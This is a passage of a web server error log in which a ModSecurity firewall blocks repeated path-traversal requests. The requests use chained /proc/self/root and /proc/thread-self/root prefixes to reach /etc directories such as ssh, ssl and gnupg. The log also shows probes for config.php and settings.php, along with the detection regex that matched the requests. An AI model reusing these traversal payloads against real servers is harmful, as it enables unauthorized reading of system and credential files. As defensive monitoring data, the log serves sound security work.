"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTeAeiSKl8TjouI-YGdwAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:29.809025 2026] [:error] [pid 1731:tid 140411641214720] [client 74.7.243.203:40650] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTeQb2qCuy5irgBMjNHwAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:31.102853 2026] [:error] [pid 18709:tid 140411557287680] [client 74.7.243.203:57856] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTezarLhPAjZGI1b2yLgAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:31.446809 2026] [access_compat:error] [pid 17965:tid 140411658000128] [client 185.177.72.38:46926] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/config.php
[Tue Mar 17 10:13:32.441003 2026] [:error] [pid 18709:tid 140411658000128] [client 74.7.243.203:57868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTfDarLhPAjZGI1b2yLwAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:33.843458 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.243.203:57882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTfaBJNF7axNlVR0UBCAAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:34.991387 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.243.203:57884] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTfpqmL8PQht4WJFlMgAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:37.328290 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.243.203:57888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTge82sZHvlq4xgHrHTAAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:38.567516 2026] [:error] [pid 1731:tid 140411725141760] [client 74.7.243.203:57896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTggb2qCuy5irgBMjNIAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:39.833432 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.243.203:57898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTgweiSKl8TjouI-YGfAAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:13:40.615575 2026] [:error] [pid 18709:tid 140411691570944] [client 74.7.228.16:50704] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablThDarLhPAjZGI1b2yMgAAA4Y"]
[Tue Mar 17 10:13:42.190490 2026] [:error] [pid 1731:tid 140411557287680] [client 74.7.243.203:39042] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablThgb2qCuy5irgBMjNIgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:13:43.554057 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.243.203:39048] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablThweiSKl8TjouI-YGfgAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:13:45.889250 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.243.203:39054] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTiaBJNF7axNlVR0UBDgAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:13:49.490879 2026] [:error] [pid 1731:tid 140411632822016] [client 74.7.243.203:39056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTjQb2qCuy5irgBMjNJgAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:13:50.774611 2026] [:error] [pid 11293:tid 140411733534464] [client 74.7.243.203:41232] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTjtCmCSWTlPouqorQGwAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:13:55.240679 2026] [:error] [pid 18604:tid 140411607643904] [client 74.7.243.203:41238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTk0Bd0UqwxWindINsSgAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:59.031274 2026] [:error] [pid 1731:tid 140411574073088] [client 74.7.243.203:41244] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTlwb2qCuy5irgBMjNKgAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:14:14.185930 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.244.31:37342] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablTpqBJNF7axNlVR0UBEwAAAAQ"]
[Tue Mar 17 10:14:29.706624 2026] [access_compat:error] [pid 1731:tid 140411708356352] [client 185.177.72.38:47536] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/settings.php
[Tue Mar 17 10:14:35.846220 2026] [cgid:error] [pid 1731:tid 140411624429312] [client 185.177.72.38:47602] AH01265: attempt to invoke directory as script: /var/www/cgi-bin/
[Tue Mar 17 10:14:57.487706 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.243.203:34040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablT0dCmCSWTlPouqorQTwAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:15:00.127892 2026] [:error] [pid 18380:tid 140411741927168] [client 74.7.243.203:48410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablT1K4xEDsg_V3ESNY3wgAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:15:07.242238 2026] [:error] [pid 2325:tid 140411683178240] [client 74.7.243.203:51702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablT2-82sZHvlq4xgHrHZwAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:15:08.541169 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.243.203:51718] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablT3JqmL8PQht4WJFlMnAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:15:11.100219 2026] [:error] [pid 18709:tid 140411691570944] [client 74.7.243.203:51734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablT3zarLhPAjZGI1b2yTQAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
